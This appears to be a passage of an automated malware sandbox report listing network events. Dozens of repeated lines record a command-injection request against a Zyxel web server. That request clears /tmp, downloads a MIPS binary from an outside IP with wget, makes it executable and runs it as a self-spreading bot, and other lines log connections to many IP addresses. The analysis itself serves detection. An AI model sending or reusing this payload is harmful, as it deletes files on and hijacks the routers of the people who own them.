      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: unknownTCP traffic detected without corresponding DNS query: 63.200.116.102
      Source: unknownTCP traffic detected without corresponding DNS query: 63.200.116.102
      Source: unknownTCP traffic detected without corresponding DNS query: 201.226.90.102
      Source: unknownTCP traffic detected without corresponding DNS query: 67.121.215.103
      Source: unknownTCP traffic detected without corresponding DNS query: 160.194.249.238
      Source: unknownTCP traffic detected without corresponding DNS query: 201.226.90.102
      Source: unknownTCP traffic detected without corresponding DNS query: 86.90.203.141
      Source: unknownTCP traffic detected without corresponding DNS query: 160.194.249.238
      Source: unknownTCP traffic detected without corresponding DNS query: 121.142.96.120
      Source: unknownTCP traffic detected without corresponding DNS query: 67.121.215.103
      Source: unknownTCP traffic detected without corresponding DNS query: 213.86.206.187
      Source: unknownTCP traffic detected without corresponding DNS query: 160.197.45.27
      Source: unknownTCP traffic detected without corresponding DNS query: 86.90.203.141
      Source: unknownTCP traffic detected without corresponding DNS query: 136.200.42.29
      Source: unknownTCP traffic detected without corresponding DNS query: 27.32.236.29
      Source: unknownTCP traffic detected without corresponding DNS query: 121.142.96.120
      Source: unknownTCP traffic detected without corresponding DNS query: 147.113.186.141
      Source: unknownTCP traffic detected without corresponding DNS query: 213.86.206.187
      Source: unknownTCP traffic detected without corresponding DNS query: 147.113.186.141
      Source: unknownTCP traffic detected without corresponding DNS query: 160.197.45.27
      Source: unknownTCP traffic detected without corresponding DNS query: 136.200.42.29
      Source: unknownTCP traffic detected without corresponding DNS query: 27.32.236.29
      Source: unknownTCP traffic detected without corresponding DNS query: 46.252.16.121
      Source: unknownTCP traffic detected without corresponding DNS query: 135.62.75.132
      Source: unknownTCP traffic detected without corresponding DNS query: 101.49.66.30
      Source: unknownTCP traffic detected without corresponding DNS query: 124.49.113.226
      Source: unknownTCP traffic detected without corresponding DNS query: 176.5.187.150
      Source: unknownTCP traffic detected without corresponding DNS query: 166.27.246.103
      Source: unknownTCP traffic detected without corresponding DNS query: 46.252.16.121
      Source: unknownTCP traffic detected without corresponding DNS query: 101.49.66.30
      Source: unknownTCP traffic detected without corresponding DNS query: 115.104.81.116
      Source: unknownTCP traffic detected without corresponding DNS query: 124.49.113.226
      Source: unknownTCP traffic detected without corresponding DNS query: 135.62.75.132
      Source: unknownTCP traffic detected without corresponding DNS query: 176.5.187.150
      Source: unknownTCP traffic detected without corresponding DNS query: 166.27.246.103
      Source: unknownTCP traffic detected without corresponding DNS query: 34.45.225.89
      Source: unknownTCP traffic detected without corresponding DNS query: 220.254.223.67
      Source: unknownTCP traffic detected without corresponding DNS query: 115.104.81.116
      Source: unknownTCP traffic detected without corresponding DNS query: 71.221.35.215
      Source: unknownTCP traffic detected without corresponding DNS query: 144.130.185.155
      Source: unknownTCP traffic detected without corresponding DNS query: 1.208.100.227
      Source: unknownTCP traffic detected without corresponding DNS query: 220.254.223.67
      Source: unknownTCP traffic detected without corresponding DNS query: 131.4.177.144
      Source: unknownTCP traffic detected without corresponding DNS query: 34.45.225.89
      Source: unknownTCP traffic detected without corresponding DNS query: 71.221.35.215
      Source: unknownTCP traffic detected without corresponding DNS query: 144.130.185.155
      Source: unknownTCP traffic detected without corresponding DNS query: 1.208.100.227
      Source: unknownTCP traffic detected without corresponding DNS query: 115.237.92.202
      Source: unknownTCP traffic detected without corresponding DNS query: 131.4.177.144
      Source: unknownTCP traffic detected without corresponding DNS query: 46.208.159.72
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
